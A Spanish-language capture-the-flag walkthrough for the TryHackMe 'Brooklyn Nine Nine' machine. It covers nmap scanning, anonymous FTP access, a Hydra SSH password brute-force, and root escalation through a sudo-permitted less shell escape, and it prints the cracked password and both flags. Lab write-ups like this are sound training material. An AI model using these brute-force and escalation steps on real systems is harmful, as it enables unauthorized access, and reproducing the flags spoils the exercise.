Hoy vamos a hackear la maquina de TryHackMe llamada
Broklyn Nine Nine. Podeis descargarla desde el siguiente enlace:
https://tryhackme.com/room/brooklynninenine
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A 10.10.60.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST
Nmap scan report for 10.10.60.217
Host is up (0.057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.24.208
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol
2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds
Nmap nos muestra que nos podemos conectar con el usuario anonymous al ftp.
Nos conectamos al ftp para ver si vemos algo interesante.
~ > ftp 10.10.60.217
Connected to 10.10.60.217.
220 (vsFTPd 3.0.3)
Name (10.10.60.217:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
226 Directory send OK.
Vemos el fichero note_to_jake.txt, lo descargamos.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.11 secs (1.0441 kB/s)
ftp> exit
221 Goodbye.
Miramos el contenido del fichero.
~ > cat note_to_jake.txt
12s
From Amy,
Jake please change your password. It is too weak and holt will be mad if
someone hacks into the nine nine
Podemos ver que Amy le dice a Jake que cambie su password ya que es debil.
Teniendo esta informacion, utilizamos hydra para hacer bruteforce de la
password de
jake por ssh.
~ > hydra -l jake -P rockyou.txt 10.10.60.217 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret
service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08
08:14:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries
(l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.217:22/
[22][ssh] host: 10.10.60.217 login: jake password: 987654321
Obtenemos la password!
Utilizamos los credenciales de jake para conectarnos por ssh...
Low Shell
Nos logueamos como jake.
~ > ssh jake@10.10.60.217
jake@10.10.60.217's password:
Last login: Tue May 26 08:56:58 2020
user.txt
Exploramos el sistema para buscar la flag de user.
jake@brookly_nine_nine:/home$ cd /home
jake@brookly_nine_nine:/home$ ls
amy holt jake
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ ls -la
total 48
drwxr-xr-x 6 holt holt 4096 May 26 09:01 .
drwxr-xr-x 5 root root 4096 May 18 10:21 ..
-rw------- 1 holt holt 18 May 26 09:01 .bash_history
-rw-r--r-- 1 holt holt 220 May 17 21:42 .bash_logout
-rw-r--r-- 1 holt holt 3771 May 17 21:42 .bashrc
drwx------ 2 holt holt 4096 May 18 10:24 .cache
drwx------ 3 holt holt 4096 May 18 10:24 .gnupg
drwxrwxr-x 3 holt holt 4096 May 17 21:46 .local
-rw-r--r-- 1 holt holt 807 May 17 21:42 .profile
drwx------ 2 holt holt 4096 May 18 14:45 .ssh
-rw------- 1 root root 110 May 18 17:12 nano.save
-rw-rw-r-- 1 holt holt 33 May 17 21:49 user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee
Miramos si podemos hacer algo con sudo.
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
Privilege Escalation
Vemos que podemos utilizar less, el cual nos puede permitir obtener
una shell con privilegios.
Para ello ejecutamos:
Una vez se nos este mostrando el fichero escribimos:
!/bin/bash
Y ya tendriamos una shell de root
root@brookly_nine_nine:~# id
uid=0(root) gid=0(root) groups=0(root)
root.txt
root@brookly_nine_nine:/root# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845
Enjoy!!
root@brookly_nine_nine:/root#
